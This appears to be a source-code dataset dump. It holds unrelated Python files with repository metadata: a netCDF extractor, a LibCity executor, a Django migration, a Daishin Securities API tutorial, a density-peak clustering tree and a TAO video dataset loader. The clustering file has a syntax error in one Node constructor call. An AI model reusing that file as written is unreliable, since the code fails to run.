indata['time'][:] / 3600 / 24 else: outdata = append_output(output_cdf) init_output_vars(outdata, **vars(args)) # Attempts to use the entire MFDataset don't seem to scale well. # Instead, I'm resorting to a blocking approach where MFDatasets are # created for only a few netCDF files at a time indata.close() i = 0 total = 0 logger.info("Beginning extraction...") start_time = time.perf_counter() times_ct = outdata.dimensions['time'].size for cdfchunk in chunks(exist_cdfs, args.chunk_size): c = MFDataset(cdfchunk) if len(cdfchunk) > 1 else Dataset(cdfchunk[0]) chunk_times = len(c.dimensions['time']) data = copy_data(c, outdata, i, node_ids, **vars(args)) i += chunk_times c.close() elapsed = (time.perf_counter() - start_time) to_go = elapsed * (times_ct / i - 1) total += np.sum([d.size * d.itemsize for k,d in data.items()]) logger.info("{0}/{1} ({2}s elapsed, {3}s to go, {4}KBps)".format(i, times_ct, int(elapsed), int(to_go), int(total/elapsed/1000))) logger.info("Extraction finished.") outdata.close() def copy_data(cdfin, cdfout, timeidx, node_ids, **kwargs): args = Namespace(**kwargs) times_ct = len(cdfin.dimensions['time']) alldata = {} # Copy zeta if it's needed if 'zeta' in cdfout.variables: alldata['zeta'] = cdfin['zeta'][:, node_ids - 1] cdfout['zeta'][timeidx:timeidx + times_ct, :] = alldata['zeta'] for var, attr in args.input_vars: out_name = args.outprefix + var if attr == InputAttr.ALL: slc = slice(None) elif attr == InputAttr.BOTTOM: slc = -1 out_name += "_bottom" # TODO add "photic" case which will look rather different data = cdfin[var][:, slc, node_ids - 1] logger.debug("data is shape " + str(data.shape)) if attr == InputAttr.ALL: cdfout[out_name][timeidx:timeidx+times_ct,:,:] = data else: cdfout[out_name][timeidx:timeidx+times_ct,:] = data alldata[out_name] = data return alldata if __name__ == "__main__": main()
40.461538
117
0.64225
93
0.0104
132
0.014762
0
0
0
0
2,388
0.267054
4c55251ed58f769e9fbe55114b14a016770952cb
1,075
py
Python
libcity/executor/map_matching_executor.py
nadiaaaaachen/Bigscity-LibCity
d8efd38fcc238e3ba518c559cc9f65b49efaaf71
[ "Apache-2.0" ]
1
2021-11-22T12:22:32.000Z
2021-11-22T12:22:32.000Z
libcity/executor/map_matching_executor.py
yuanhaitao/Bigscity-LibCity
9670c6a2f26043bb8d9cc1715780bb599cce2cd5
[ "Apache-2.0" ]
null
null
null
libcity/executor/map_matching_executor.py
yuanhaitao/Bigscity-LibCity
9670c6a2f26043bb8d9cc1715780bb599cce2cd5
[ "Apache-2.0" ]
null
null
null
from logging import getLogger from libcity.executor.abstract_tradition_executor import AbstractTraditionExecutor from libcity.utils import get_evaluator class MapMatchingExecutor(AbstractTraditionExecutor): def __init__(self, config, model): self.model = model self.config = config self.evaluator = get_evaluator(config) self.evaluate_res_dir = './libcity/cache/evaluate_cache' self._logger = getLogger() def evaluate(self, test_data): """ use model to test data Args: test_data """ result = self.model.run(test_data) batch = {'route': test_data['route'], 'result': result, 'rd_nwk': test_data['rd_nwk']} self.evaluator.collect(batch) self.evaluator.save_result(self.evaluate_res_dir) def train(self, train_dataloader, eval_dataloader): """ 对于传统模型,不需要训练 Args: train_dataloader(torch.Dataloader): Dataloader eval_dataloader(torch.Dataloader): Dataloader """ pass # do nothing
29.861111
94
0.652093
943
0.858053
0
0
0
0
0
0
357
0.324841
4c55a30419a518ea1054e9871ae5c2c7cf5db9f5
307
py
Python
project1/budget/migrations/0005_delete_hiddenstatus_budget.py
sujeethiremath/Project-1
7f0bff66287d479e231e123615f2df18f9107178
[ "MIT" ]
null
null
null
project1/budget/migrations/0005_delete_hiddenstatus_budget.py
sujeethiremath/Project-1
7f0bff66287d479e231e123615f2df18f9107178
[ "MIT" ]
null
null
null
project1/budget/migrations/0005_delete_hiddenstatus_budget.py
sujeethiremath/Project-1
7f0bff66287d479e231e123615f2df18f9107178
[ "MIT" ]
null
null
null
# Generated by Django 2.2.5 on 2020-04-08 00:08 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('budget', '0004_auto_20200407_2356'), ] operations = [ migrations.DeleteModel( name='HiddenStatus_Budget', ), ]
18.058824
47
0.618893
222
0.723127
0
0
0
0
0
0
101
0.32899
4c55bbb06ea35dd59d573da6a8f782da8c81fbf2
3,548
py
Python
tutorial/43.py
mssung94/daishin-trading-system
d6682495afb7a08e68db65537b1d1789f2996891
[ "MIT" ]
2
2020-11-21T08:45:26.000Z
2020-11-21T08:50:56.000Z
tutorial/43.py
mssung94/daishin-trading-system
d6682495afb7a08e68db65537b1d1789f2996891
[ "MIT" ]
null
null
null
tutorial/43.py
mssung94/daishin-trading-system
d6682495afb7a08e68db65537b1d1789f2996891
[ "MIT" ]
null
null
null
# 대신증권 API # 데이터 요청 방법 2가지 BlockRequest 와 Request 방식 비교 예제 # 플러스 API 에서 데이터를 요청하는 방법은 크게 2가지가 있습니다 # # BlockRequest 방식 - 가장 간단하게 데이터 요청해서 수신 가능 # Request 호출 후 Received 이벤트로 수신 받기 # # 아래는 위 2가지를 비교할 수 있도록 만든 예제 코드입니다 # 일반적인 데이터 요청에는 BlockRequest 방식이 가장 간단합니다 # 다만, BlockRequest 함수 내에서도 동일 하게 메시지펌핑을 하고 있어 해당 통신이 마치기 전에 실시간 시세를 수신 받거나 # 다른 이벤트에 의해 재귀 호출 되는 문제가 있을 경우 함수 호출이 실패할 수 있습니다 # 복잡한 실시간 시세 수신 중에 통신을 해야 하는 경우에는 Request 방식을 이용해야 합니다. import pythoncom from PyQt5.QtWidgets import * import win32com.client import win32event g_objCodeMgr = win32com.client.Dispatch('CpUtil.CpCodeMgr') StopEvent = win32event.CreateEvent(None, 0, 0, None) class CpEvent: def set_params(self, client, name, caller): self.client = client # CP 실시간 통신 object self.name = name # 서비스가 다른 이벤트를 구분하기 위한 이름 self.caller = caller # callback 을 위해 보관 def OnReceived(self): # 실시간 처리 - 현재가 주문 체결 if self.name == 'stockmst': print('recieved') win32event.SetEvent(StopEvent) return class CpCurReply: def __init__(self, objEvent): self.name = "stockmst" self.obj = objEvent def Subscribe(self): handler = win32com.client.WithEvents(self.obj, CpEvent) handler.set_params(self.obj, self.name, None) def MessagePump(timeout): waitables = [StopEvent] while 1: rc = win32event.MsgWaitForMultipleObjects( waitables, 0, # Wait for all = false, so it waits for anyone timeout, # (or win32event.INFINITE) win32event.QS_ALLEVENTS) # Accepts all input if rc == win32event.WAIT_OBJECT_0: # Our first event listed, the StopEvent, was triggered, so we must exit print('stop event') break elif rc == win32event.WAIT_OBJECT_0 + len(waitables): # A windows message is waiting - take care of it. (Don't ask me # why a WAIT_OBJECT_MSG isn't defined < WAIT_OBJECT_0...!). # This message-serving MUST be done for COM, DDE, and other # Windowsy things to work properly! print('pump') if pythoncom.PumpWaitingMessages(): break # we received a wm_quit message elif rc == win32event.WAIT_TIMEOUT: print('timeout') return pass else: print('exception') raise RuntimeError("unexpected win32wait return value") code = 'A005930' ############################################################## # 1. BlockRequest print('#####################################') objStockMst = win32com.client.Dispatch("DsCbo1.StockMst") objStockMst.SetInputValue(0, code) objStockMst.BlockRequest() print('BlockRequest 로 수신 받은 데이터') item = {} item['종목명'] = g_objCodeMgr.CodeToName(code) item['현재가'] = objStockMst.GetHeaderValue(11) # 종가 item['대비'] = objStockMst.GetHeaderValue(12) # 전일대비 print(item) print('') ############################################################## # 2. Request ==> 메시지 펌프 ==> OnReceived 이벤트 수신 print('#####################################') objReply = CpCurReply(objStockMst) objReply.Subscribe() code = 'A005930' objStockMst.SetInputValue(0, code) objStockMst.Request() MessagePump(10000) item = {} item['종목명'] = g_objCodeMgr.CodeToName(code) item['현재가'] = objStockMst.GetHeaderValue(11) # 종가 item['대비'] = objStockMst.GetHeaderValue(12) # 전일대비 print(item)
31.39823
84
0.590755
748
0.179033
0
0
0
0
0
0
2,080
0.497846
4c55db68c1c667219febb6705164366e8f8c7adb
18,439
py
Python
ADPTC_LIB/DPTree_ST.py
SuilandCoder/ADPTC_LIB
ef5c2b7fcf117c8c90a3841489471289ecbf4562
[ "MIT" ]
null
null
null
ADPTC_LIB/DPTree_ST.py
SuilandCoder/ADPTC_LIB
ef5c2b7fcf117c8c90a3841489471289ecbf4562
[ "MIT" ]
null
null
null
ADPTC_LIB/DPTree_ST.py
SuilandCoder/ADPTC_LIB
ef5c2b7fcf117c8c90a3841489471289ecbf4562
[ "MIT" ]
null
null
null
#%% import numpy as np import copy import matplotlib.pyplot as plt import time def split_cluster_new(tree,local_density,dc_eps,closest_denser_nodes_id,mixin_near_matrix): ''' dc_eps: density_connectivity 阈值 使用父子节点的直接距离,与子节点与兄弟节点的连通距离进行聚簇划分; 使用平均密度划分outlier 返回: outlier_forest cluster_forest ''' mean_density = np.mean(local_density) outlier_forest = {} cluster_forest = {} uncertain_forest = {} not_direct_reach = [] #* 计算不可直接可达的点: for k in range(len(closest_denser_nodes_id)): near_nodes = mixin_near_matrix[k] if closest_denser_nodes_id[k] not in near_nodes: not_direct_reach.append(k) pass not_direct_reach = np.array(not_direct_reach) # not_direct_reach = np.where(closest_dis_denser>eps)[0] #* 将不直接距离可达的点按层次排列: # not_direct_reach = np.array(not_direct_reach) depth_list_not_direct_reach= np.zeros(len(not_direct_reach),dtype=np.int16) for i in range(len(not_direct_reach)): # depth_list_not_direct_reach[i] = tree.node_dir[not_direct_reach[i]].getLvl() depth_list_not_direct_reach[i] = tree.calcu_depth(not_direct_reach[i],0) pass not_direct_reach = list(not_direct_reach[np.argsort(depth_list_not_direct_reach)]) #* 模拟栈结构,层次深的先处理 start = time.clock() while(len(not_direct_reach)>0): #* 判断是否 连通:距离小于阈值,并且密度要大于子树的平均密度 node_id = not_direct_reach.pop() if(node_id==129193 or node_id==61589 or node_id == 123593): print(node_id) if node_id in tree.sorted_gamma_index[0:10]: cluster_forest[node_id] = tree.remove_subtree(node_id) continue node = tree.node_dir[node_id] parent_id = node.parent_id parent_node = tree.node_dir[parent_id] children = parent_node.getChildren() siblings_reliable = [ i for i in children if i not in not_direct_reach] #* 求得兄弟节点,其中兄弟节点不能是不直接可达的点 not_reliable_nodes = [i for i in children if i not in siblings_reliable] if node_id in not_reliable_nodes: not_reliable_nodes.remove(node_id) if node_id in siblings_reliable: siblings_reliable.remove(node_id) pairs_nodes = is_connected_new(tree,local_density,dc_eps,node_id,siblings_reliable,not_reliable_nodes,mixin_near_matrix) if len(pairs_nodes)==0: if(node_id==tree.root_node.node_id): continue if(local_density[node_id]-mean_density*dc_eps)>=0: #* 获取子节点个数: offspring_id = tree.get_subtree_offspring_id(node_id,[node_id]) if(len(offspring_id)<local_density[node_id]): uncertain_forest[node_id] = tree.remove_subtree(node_id) pass else: cluster_forest[node_id] = tree.remove_subtree(node_id) pass pass else: outlier_forest[node_id] = tree.remove_subtree(node_id) pass pass pass end = time.clock() print('切割树耗时 %s' % str(end - start)) cluster_forest[tree.root_node.node_id] = tree #* 添加根节点的树 return outlier_forest, cluster_forest, uncertain_forest def is_connected_new(tree,local_density,dc_eps,cur_node_id,reliable_nodes,not_reliable_nodes,mixin_near_matrix): ''' cur_node: 当前待判断与父节点连通度的点; reliable_nodes:兄弟节点中与父节点直接相连的点; not_reliable_nodes:兄弟节点中不与父节点直接相连的点,但可能间接相连; 连通度判断方案: 1. 判断 cur_node 与 reliable_nodes 是否可达,是则返回;没有则执行2; 2. 判断 cur_node 与 not_reliable_nodes(假设为[a,b,c,d,e]) 是否可达,若与[a,b,c]可达,与[d,e]不可达,执行3; 3. 循环遍历[a,b,c],递归调用本方法 is_connected_entropy(……,cur_node_id=[a],reliable_nodes,not_reliable_nodes=[b,c,d,e]) ''' #* 1. if(len(reliable_nodes)==0): return [] for reliable_node_id in reliable_nodes: pairs_nodes, connected_nodes = tree.calcu_neighbor_btw_subtree(cur_node_id,reliable_node_id,mixin_near_matrix) if(len(pairs_nodes)==0): continue # return pairs_nodes cur_node_offspring = tree.get_subtree_offspring_id(cur_node_id,[cur_node_id]) local_density_cur_offspring = np.mean(local_density[cur_node_offspring]) local_density_connected_nodes = np.mean(local_density[connected_nodes]) if(local_density_connected_nodes>local_density_cur_offspring*dc_eps): return pairs_nodes pass #* 2. for i in range(len(not_reliable_nodes)): pairs_nodes, connected_nodes = tree.calcu_neighbor_btw_subtree(cur_node_id,not_reliable_nodes[i],mixin_near_matrix) if(len(pairs_nodes)==0): pairs_nodes = is_connected_new(tree,local_density,dc_eps,not_reliable_nodes[i],reliable_nodes,not_reliable_nodes[i+1:],mixin_near_matrix) if(len(pairs_nodes)>0): return pairs_nodes else: cur_node_offspring = tree.get_subtree_offspring_id(cur_node_id,[cur_node_id]) local_density_cur_offspring = np.mean(local_density[cur_node_offspring]) local_density_connected_nodes = np.mean(local_density[connected_nodes]) if(local_density_connected_nodes>local_density_cur_offspring*dc_eps): return pairs_nodes # return pairs_nodes # #* 连通点平均密度大于局部密度阈值,则更新最大相似度 cur_node_offspring = tree.get_subtree_offspring_id(cur_node_id,[cur_node_id]) local_density_cur_offspring = np.mean(local_density[cur_node_offspring]) local_density_connected_nodes = np.mean(local_density[connected_nodes]) if(local_density_connected_nodes>local_density_cur_offspring*dc_eps): return pairs_nodes if(len(pairs_nodes)==0): pairs_nodes = is_connected_new(tree,local_density,dc_eps,not_reliable_nodes[i],reliable_nodes,not_reliable_nodes[i+1:],mixin_near_matrix) if(len(pairs_nodes)>0): return pairs_nodes # pass return [] def label_these_node_new(outlier_forest,cluster_forest,node_num,uncertain_forest,mixin_near_matrix): ''' 给森林中的样本点贴标签 考虑不确定点的分配 ''' labels = np.full((node_num),-1,dtype=np.int32) for outlier_id in outlier_forest: outlier_tree = outlier_forest[outlier_id] outlier_idlist = outlier_tree.get_subtree_offspring_id(outlier_id,[outlier_id]) labels[outlier_idlist] = -1 pass label = 0 for tree_id in cluster_forest: cluster_tree = cluster_forest[tree_id] cluster_idlist = cluster_tree.get_subtree_offspring_id(tree_id,[tree_id]) labels[cluster_idlist] = label label = label + 1 pass #todo 修改此处代码 for uncertain_tree_id in uncertain_forest: uncertain_tree = uncertain_forest[uncertain_tree_id] uncertain_nodes_id = uncertain_tree.get_subtree_offspring_id(uncertain_tree_id,[uncertain_tree_id]) all_near_nodes = np.array([],dtype=np.int32) for node_id in uncertain_nodes_id: all_near_nodes = np.append(all_near_nodes,mixin_near_matrix[node_id]) pass # all_near_nodes = mixin_near_matrix[uncertain_nodes_id] all_near_nodes = np.unique(all_near_nodes) all_near_nodes = all_near_nodes[np.where(labels[all_near_nodes]!=-1)] unique_labels,counts=np.unique(labels[all_near_nodes],return_counts=True) if(len(counts)==0): cur_label = -1 else: cur_label = unique_labels[np.argmax(counts)] labels[uncertain_nodes_id]=cur_label pass core_points = cluster_forest.keys() return labels,core_points ''' 密度峰值树; 根据cfsfdp算法生成的局部密度、高密度最近邻距离、决策指标来生成 DPTree; ''' class Node(): def __init__(self,node_id,attr_list,parent_id=None,dist_to_parent=None,density=None,gamma=None,children=[]): self.node_id = node_id self.attr_list = attr_list self.parent_id = parent_id self.dist_to_parent = dist_to_parent self.density = density self.children = children self.gamma = gamma self.offspring_num = None self.lvl = None def addChild(self,child): self.children+=[child] def removeChild(self,child): self.children.remove(child) def resetChildren(self): self.children = [] def setParentId(self,parent_id): self.parent_id = parent_id def setOffspringNum(self,num): self.offspring_num = num def setLvl(self,lvl): self.lvl = lvl def getAttr(self): return self.attr_list def getNodeId(self): return self.node_id def getParentId(self): return self.parent_id def getDistToParent(self): return self.dist_to_parent def getDensity(self): return self.density def getGamma(self): return self.gamma def getChildren(self): return self.children def hasChildren(self,child_id): if child_id in self.children: return True else: return False def getOffspringNum(self): return self.offspring_num def getLvl(self): return self.lvl class DPTree(): def __init__(self): self.node_count = 0 self.node_dir = {} self.root_node = None self.node_offspring = {} self.sorted_gamma_index = None pass def createTree(self,X,sorted_gamma_index,closest_node_id,closest_dis_denser,local_density,gamma): #* 根据 gamma 顺序新建节点 node_dir = {} node_created = np.zeros(len(sorted_gamma_index)) self.sorted_gamma_index = sorted_gamma_index for i in range(len(sorted_gamma_index)): node_id = sorted_gamma_index[i] parent_id = closest_node_id[node_id] #* closest_node_id是根据排序后的gamma获得的 attr_list = X[node_id] dist_to_parent = closest_dis_denser[node_id] density = local_density[node_id] if(node_created[node_id]==0): node = Node(node_id,attr_list,parent_id,dist_to_parent=dist_to_parent,density=density,gamma[node_id],children=[]) node_created[node_id] = 1 node_dir[node_id] = node node_dir[node_id].setParentId(parent_id) if(node_created[parent_id]==0): parent_node = Node(parent_id,X[parent_id],parent_id=None,dist_to_parent=closest_dis_denser[parent_id],density=local_density[parent_id],gamma=gamma[parent_id],children=[]) node_created[parent_id] = 1 node_dir[parent_id] = parent_node parent_node = node_dir[parent_id] cur_node = node_dir[node_id] if(node_id != parent_id):#* 非根节点 parent_node.addChild(node_id) # parent_lvl = parent_node.getLvl() # cur_node.setLvl(parent_lvl+1) else: if(parent_node.getLvl()==None): parent_node.setLvl(0) #* 设置节点层次信息 # for i in tree.node_dir: # pass self.root_node = node_dir[sorted_gamma_index[0]] self.node_dir = node_dir self.node_count = len(sorted_gamma_index) pass def printTree2(self,parent_id,spaceStr=''): for node_id in self.node_dir: if(node_id==self.root_node.node_id): continue node = self.node_dir[node_id] if(node.parent_id==parent_id): print(spaceStr, node.node_id, sep = '') self.printTree2(node.node_id,spaceStr+' ') pass def calcu_subtree_offspring_num(self,node_id): node = self.node_dir[node_id] cur_offsprings = node.getOffspringNum() if(cur_offsprings!=None): return cur_offsprings child_num = len(node.children) if(child_num==0): return 0 for i in node.children: cur_offsprings = self.calcu_subtree_offspring_num(i) child_num+=cur_offsprings node.setOffspringNum(child_num) return child_num def get_subtree_offspring_id(self,node_id,other_idlist): ''' 获取所有子孙的node_id 考虑:是否需要存储在node属性中。 ''' def fn_get_subtree_offspring_id(node_id,offspring_idlist): if(node_id in self.node_offspring.keys()): return self.node_offspring[node_id] else: node = self.node_dir[node_id] children = node.getChildren() child_num = len(children) if(child_num==0): self.node_offspring[node_id] = offspring_idlist return offspring_idlist offspring_idlist= list(offspring_idlist) + children for i in children: child_offspring_idlist = fn_get_subtree_offspring_id(i,[]) self.node_offspring[i] = child_offspring_idlist offspring_idlist= list(offspring_idlist) + child_offspring_idlist pass self.node_offspring[node_id] = offspring_idlist return offspring_idlist offspring_idlist = fn_get_subtree_offspring_id(node_id,[]) return np.array(list(offspring_idlist) + other_idlist) def calcu_subtree_entropy(self,offspring_id,local_density,closest_dis_denser): p_sum = np.sum(local_density[offspring_id]/closest_dis_denser[offspring_id]) p = (local_density[offspring_id]/closest_dis_denser[offspring_id])/p_sum entropy = -1*np.sum(p*np.log2(p)) #* 只有一个点的情况返回 0 if(entropy==0): return 0 return entropy/(-1*np.log2(1/(len(offspring_id)))) def remove_subtree(self,child_id): ''' 删除 node_id 节点的子树:child_id, 被删除的子树形成新的树并返回 1. 更新 self.node_dir, self.node_count 2. 更新 node_id 节点的 children[], 以及所有父级offspring_num 3. 生成新树 ''' # print("删除子节点:",child_id) offspring_id = self.get_subtree_offspring_id(child_id,[child_id]) offspring_len = len(offspring_id) node_id = self.node_dir[child_id].parent_id node = self.node_dir[node_id] node.removeChild(child_id) self.node_count = self.node_count-offspring_len #* 删除存储的子孙节点 if(node_id in self.node_offspring.keys()): for node_to_delete in offspring_id: self.node_offspring[node_id].remove(node_to_delete) print("删除子孙节点:",node_to_delete) pass pass # cur_id = child_id # parent_id = node_id # #* 设置父级 offspring_num: # while(cur_id!=parent_id): # parent_node = self.node_dir[parent_id] # if(parent_node.getOffspringNum()!=None): # parent_node.setOffspringNum(parent_node.getOffspringNum()-offspring_len) # cur_id = parent_id # parent_id = parent_node.parent_id # pass #* 更新 self.node_dir, 生成新树: new_tree = DPTree() for i in offspring_id: removed_node = self.node_dir.pop(i) new_tree.node_dir[i] = removed_node pass new_tree.node_count = offspring_len new_tree.root_node = new_tree.node_dir[child_id] new_tree.root_node.setParentId(child_id) return new_tree def calcu_dist_betw_subtree(self,node_id_one,node_id_two,dist_mat,eps): ''' 计算两个子树间的连通距离 return: 1. 最短距离 2. 小于距离阈值的点集 ''' connected_nodes = np.array([],dtype=np.int32) offspring_one = self.get_subtree_offspring_id(node_id_one,[node_id_one]) offspring_two = self.get_subtree_offspring_id(node_id_two,[node_id_two]) dist = float('inf') for i in offspring_two: tmp_dist = np.min(dist_mat[i][offspring_one]) if(tmp_dist<dist): dist = tmp_dist pass connected_nodes_index = np.where(dist_mat[i][offspring_one]<eps)[0] if len(connected_nodes_index)>0: connected_nodes = np.r_[[i],connected_nodes,offspring_one[connected_nodes_index]] pass return dist, np.unique(connected_nodes) def calcu_neighbor_btw_subtree(self,node_id_one,node_id_two,mixin_near_matrix): ''' 计算两个子树间的邻近点 return: 邻近的点对 所有邻近点 ''' connected_nodes = np.array([],dtype=np.int32) offspring_one = self.get_subtree_offspring_id(node_id_one,[node_id_one]) offspring_two = self.get_subtree_offspring_id(node_id_two,[node_id_two]) pairs_nodes = [] for i in offspring_two: connected_nodes_index = np.intersect1d(mixin_near_matrix[i],offspring_one) if len(connected_nodes_index)>0: for j in connected_nodes_index: pairs_nodes.append([i,j]) pass pass if(len(pairs_nodes)==0): return pairs_nodes,connected_nodes return np.array(pairs_nodes), np.unique(np.array(pairs_nodes).flatten()) def calcu_dist_betw_subtree_entropy(self,node_id_one,node_id_two,dist_mat,eps): ''' 计算两个子树间的连通距离 return: 1. 最大相似距离 2. 大于相似距离阈值的点集 ''' connected_nodes = np.array([],dtype=np.int32) offspring_one = self.get_subtree_offspring_id(node_id_one,[node_id_one]) offspring_two = self.get_subtree_offspring_id(node_id_two,[node_id_two]) dist = -1 for i in offspring_two: tmp_dist = np.max(dist_mat[i][offspring_one]) if(tmp_dist>=dist): dist = tmp_dist pass connected_nodes_index = np.where(dist_mat[i][offspring_one]>=eps)[0] if len(connected_nodes_index)>0: connected_nodes = np.r_[[i],connected_nodes,offspring_one[connected_nodes_index]] pass return dist, np.unique(connected_nodes) def calcu_depth(self,node_id, depth): node = self.node_dir[node_id] parent_id = node.parent_id if(node_id==parent_id): return depth else: return self.calcu_depth(parent_id,depth+1)
38.575314
186
0.633548
11,101
0.566927
0
0
0
0
0
0
3,557
0.181656
4c56a26b957f0f1d768b5949bae27c075bbc9817
10,280
py
Python
datasets/tao/tao.py
Nik-V9/AirObject
5937e64531f08449e81d2c90e3c6643727efbaf0
[ "BSD-3-Clause" ]
9
2022-03-15T17:28:48.000Z
2022-03-29T12:32:28.000Z
datasets/tao/tao.py
Nik-V9/AirObject
5937e64531f08449e81d2c90e3c6643727efbaf0
[ "BSD-3-Clause" ]
1
2022-03-29T06:03:14.000Z
2022-03-29T13:38:29.000Z
datasets/tao/tao.py
Nik-V9/AirObject
5937e64531f08449e81d2c90e3c6643727efbaf0
[ "BSD-3-Clause" ]
1
2022-03-15T19:34:06.000Z
2022-03-15T19:34:06.000Z
from __future__ import print_function import sys sys.path.append('.') import os from typing import Optional, Union import cv2 import numpy as np import PIL.Image as Image import pickle import torch from torch.utils import data __all__ = ["TAO"] class TAO(data.Dataset): r"""A torch Dataset for loading in `the TAO VOS dataset <https://www.vision.rwth-aachen.de/page/taovos/>`_. Will fetch sequences of rgb images, instance segmentation labels, SuperPoint features (optional). Example of sequence creation from frames with `seqlen=4`, `dilation=1`, `stride=3`, and `start=2`: .. code-block:: sequence0 ┎───────────────┲───────────────┲───────────────┒ | | | | frame0 frame1 frame2 frame3 frame4 frame5 frame6 frame7 frame8 frame9 frame10 frame11 ... | | | | └───────────────┵───────────────┵────────────────┚ sequence1 Args: basedir (str): Path to the base directory containing the directories from TAO. videos (str or tuple of str): Videos to use from sequences (used for creating train/val/test splits). Can be path to a `.txt` file where each line is a Video Seqeunce name, a tuple of scene names. seqlen (int): Number of frames to use for each sequence of frames. Default: 4 dilation (int or None): Number of (original video's) frames to skip between two consecutive frames in the extracted sequence. See above example if unsure. If None, will set `dilation = 0`. Default: None stride (int or None): Number of frames between the first frames of two consecutive extracted sequences. See above example if unsure. If None, will set `stride = seqlen * (dilation + 1)` (non-overlapping sequences). Default: None start (int or None): Index of the frame from which to start extracting sequences for every video. If None, will start from the first frame. Default: None end (int): Index of the frame at which to stop extracting sequences for every video. If None, will continue extracting frames until the end of the video. Default: None height (int): Spatial height to resize frames to. Default: 480 width (int): Spatial width to resize frames to. Default: 640 return_seg (bool): Determines whether to return instance segmentation labels. Default: True return_points (bool): Determines whether to return SuperPoint Features. Default: False return_videonames (bool): Determines whether to return videonames for the sequences. Default: False """ def __init__( self, basedir: str, videos: Union[tuple, str, None], seqlen: int = 4, dilation: Optional[int] = None, stride: Optional[int] = None, start: Optional[int] = None, end: Optional[int] = None, height: int = 480, width: int = 640, *, return_img: bool = True, return_seg: bool = True, return_points: bool = False, return_videonames: bool = False, ): super(TAO, self).__init__() self.basedir = os.path.normpath(basedir) if not os.path.isdir(self.basedir): raise ValueError("Base Directory: {} doesn't exist".format(basedir)) self.height = height self.width = width self.return_img = return_img self.return_seg = return_seg self.return_points = return_points self.return_videonames = return_videonames if not isinstance(seqlen, int): raise TypeError("seqlen must be int. Got {0}.".format(type(seqlen))) if not (isinstance(stride, int) or stride is None): raise TypeError("stride must be int or None. Got {0}.".format(type(stride))) if not (isinstance(dilation, int) or dilation is None): raise TypeError( "dilation must be int or None. Got {0}.".format(type(dilation)) ) dilation = dilation if dilation is not None else 0 stride = stride if stride is not None else seqlen * (dilation + 1) self.seqlen = seqlen self.stride = stride self.dilation = dilation if seqlen < 0: raise ValueError("seqlen must be positive. Got {0}.".format(seqlen)) if dilation < 0: raise ValueError('"dilation" must be positive. Got {0}.'.format(dilation)) if stride < 0: raise ValueError("stride must be positive. Got {0}.".format(stride)) if not (isinstance(start, int) or start is None): raise TypeError("start must be int or None. Got {0}.".format(type(start))) if not (isinstance(end, int) or end is None): raise TypeError("end must be int or None. Got {0}.".format(type(end))) start = start if start is not None else 0 self.start = start self.end = end if start < 0: raise ValueError("start must be positive. Got {0}.".format(stride)) if not (end is None or end > start): raise ValueError( "end ({0}) must be None or greater than start ({1})".format(end, start) ) # videos should be a tuple if isinstance(videos, str): if os.path.isfile(videos): with open(videos, "r") as f: videos = tuple(f.read().split("\n")) else: raise ValueError("incorrect filename: {} doesn't exist".format(videos)) elif not (isinstance(videos, tuple)): msg = "videos should either be path to split.txt or tuple of videos, but was of type %r instead" raise TypeError(msg % type(videos)) self.RGB_data = [] self.Seg_data = [] self.Points_data = [] self.Videonames_data = [] idx = np.arange(self.seqlen) * (self.dilation + 1) rgbdir = os.path.join(self.basedir, 'JPEGImages/') pointsdir = os.path.join(self.basedir, 'points/') segdir = os.path.join(self.basedir, 'Annotations/') for video in videos: file_names = [f for f in sorted(os.listdir(os.path.join(rgbdir, video))) if f.endswith('.jpg')] rgb_list = [os.path.join(os.path.join(rgbdir, video), x) for x in file_names] if self.return_points: points_list = [os.path.join(os.path.join(pointsdir, video), x.replace('.jpg','.pkl')) for x in file_names] if self.return_seg: seg_list = [os.path.join(os.path.join(segdir, video), x.replace('.jpg','.png')) for x in file_names] video_len = len(rgb_list) for start_index in range(self.start, video_len, self.stride): if start_index + idx[-1] >= video_len: break inds = start_index + idx self.RGB_data.append([rgb_list[ind] for ind in inds]) if self.return_seg: self.Seg_data.append([seg_list[ind] for ind in inds]) if self.return_points: self.Points_data.append([points_list[ind] for ind in inds]) if self.return_videonames: self.Videonames_data.append(video) self.num_sequences = len(self.RGB_data) def __len__(self): r"""Returns the length of the dataset. """ return self.num_sequences def __getitem__(self, idx: int): r"""Returns the data from the sequence at index idx. Returns: color_seq (torch.Tensor): Sequence of grayscale rgb images of each frame seg_seq (torch.Tensor): Sequence of instance segmentation labels for objects present in the frames points_seq (torch.Tensor): Sequence of SuperPoint Features videoname (str): Videoname of Sequence Shape: - color_seq: :math:`(L, 3, H, W)` where `L` denotes sequence length - seg_seq: : "math: List of per frame instance segmentations with length `L` - points_seq: "math: List of SuperPoint Features with length `L` """ # Read in the color info. if self.return_img: color_seq_path = self.RGB_data[idx] if self.return_seg: seg_seq_path = self.Seg_data[idx] if self.return_points: points_seq_path = self.Points_data[idx] color_seq, seg_seq, points_seq = [], [], [] for i in range(self.seqlen): if self.return_img: image = cv2.imread(color_seq_path[i]) image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) image = torch.from_numpy(image).type(torch.float16) image = image.permute(2,0,1) image /= 255 color_seq.append(image) if self.return_seg: instance_img = np.array(Image.open(seg_seq_path[i])) obj_ids = np.unique(instance_img) obj_ids = obj_ids[~np.isin(obj_ids, [0])] frame_ann = [] for obj_id in obj_ids: ann = {} ann['obj_id'] = obj_id ann_mask = np.isin(instance_img, obj_id).astype(int) ann['ann_mask'] = ann_mask frame_ann.append(ann) seg_seq.append(frame_ann) if self.return_points: with open(points_seq_path[i],'rb') as fp: points = pickle.load(fp) points_seq.append(points) output = [] if self.return_img: color_seq = torch.stack(color_seq, 0).float() output.append(color_seq) if self.return_seg: output.append(seg_seq) if self.return_points: output.append(points_seq) if self.return_videonames: output.append(self.Videonames_data[idx]) return tuple(output)
41.788618
135
0.569163
10,229
0.976236
0
0
0
0
0
0
4,228
0.403512
4c573a085ee0bd360c33de2b14ef3c06c724afc8
2,572
py
Python
Platforms/Web/Processing/Api/Discord/Configs/Quotedisabledchannels/errors.py
The-CJ/Phaazebot
83a9563d210718071d4e2cdcca3b212c87abaf51
[ "MIT" ]
2
2017-09-14T08:07:55.000Z
2021-05-18T05:05:05.000Z
Platforms/Web/Processing/Api/Discord/Configs/Quotedisabledchannels/errors.py
The-CJ/Phaazebot
83a9563d210718071d4e2cdcca3b212c87abaf51
[ "MIT" ]
111
2018-04-15T14:32:14.000Z
2021-03-28T21:06:29.000Z
Platforms/Web/Processing/Api/Discord/Configs/Quotedisabledchannels/errors.py
The-CJ/Phaazebot
